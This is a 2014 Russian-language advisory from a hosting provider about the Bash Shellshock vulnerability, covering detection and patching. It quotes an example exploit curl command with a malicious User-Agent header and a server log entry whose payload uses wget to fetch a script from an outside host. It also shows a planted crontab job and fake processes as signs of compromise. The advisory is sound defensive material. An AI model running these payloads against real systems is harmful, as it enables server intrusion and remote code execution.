Взлом серверов через уязвимость "Bash Shellshock"

Наверняка вы уже слышали об обнаруженной в сентябре этого года уязвимости “Bash Shellshock”. Уязвимость присутствует в 100% старых операционных систем, использующихся нашими клиентами услуги VDS и Dedicated. Подробные инструкции по обновлению bash представлены в статье на нашем сайте. На данный момент, среди наших клиентов уже зафиксированы случаи взлома серверов с необновленным bash.

Как понять, что вас взломали? На взломанном сервере резко возрастает потребление трафика и объем используемых ресурсов процессора, запускаются “подозрительные”” процессы, в crontab прописываются сторонние команды.

На примере

Эксплуатируют уязвимость “Bash Shellshock” таким образом:

curl -H "User-Agent: () { :;};/usr/bin/id" http://(ip-адрес)/cgi-bin/php

После этого от имени www-data запускается:

-- /usr/bin/id.

Так выглядит запись в логе веб-сервера об атаке:

127.0.0.1:80 178.60.32.36 - - [20/Oct/2014:01:44:45 +0600] "GET /cgi-bin/php HTTP/1.1" 500 811 "-" "() { :;}; /usr/bin/wget -O /tmp/c.pl --no-check-certificate http://(ip-адрес)/t.txt

На взломанном сервере можно наблюдать сторонние команды в crontab:

root@uХХХХХ:~# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron installed on Mon Oct 20 01:22:02 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /dev/shm/.f/update >/dev/null 2>&1

root@uХХХХХ:~# ls /dev/shm/.f/update
/dev/shm/.f/update

А так же “сторонние” процессы от пользователя www-data (от которого должен быть запущен только apache/nginx):

root@uХХХХХ:~# ps axu | grep www-data
...
www-data 21639 12.6  0.1   4568  2416 ?        R    00:26  15:42 klogd -x
www-data 22806  0.0  0.0   4568  1684 ?        S    01:22   0:00 klogd -x
www-data 22810  0.0  0.0   2112   952 ?        Ss   01:22   0:02 crond
www-data 23634  1.1  0.1   4568  2436 ?        S    01:52   0:26 klogd -x
...

Мы приняли срочные меры по устранению проблемы: чтобы прекратить попытки взлома, настроили фильтрацию для серверов на которых размещаются клиенты с услугой VDS, кроме того выполнили автоматизированное обновление bash на 99% виртуальных Облачных серверов наших клиентов. В связи с этим обращаем ваше внимание на необходимость незамедлительного обновления bash!

Быстрая проверка на наличие уязвимости

Для проверки вашего bash на предмет уязвимости достаточно зайти в консоль сервера и выполнить вот такую команду:

env X="() { :;} ; echo vulnerable" bash -c "echo stuff"

Если в результате выполнения этой команды вы увидите две строки и одна из них будет со словом ‘vulnerable’, ваш bash уязвим.

Если вы не знаете как произвести обновление или даже как проверить уязвима ли операционная система на вашем сервере, рекомендуем обратиться в нашу техническую поддержку по телефонам +7 (343) 253-55-00, 8-800-2000-699 или электронной почте info@netangels.ru. Работы по обновлению системы будут произведены на платной основе по нашему прейскуранту.

22.10.2014
С 2003 года
Надежность.
Нам доверяют десятки тысяч компаний и разработчиков
20 лет
Предоставляем услуги профессионального хостинга
35 000
Клиентов доверяют нам размещение своих сайтов
99.99%
Подтвержденный uptime
наших серверов хостинга
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
Наши клиенты
ВК49865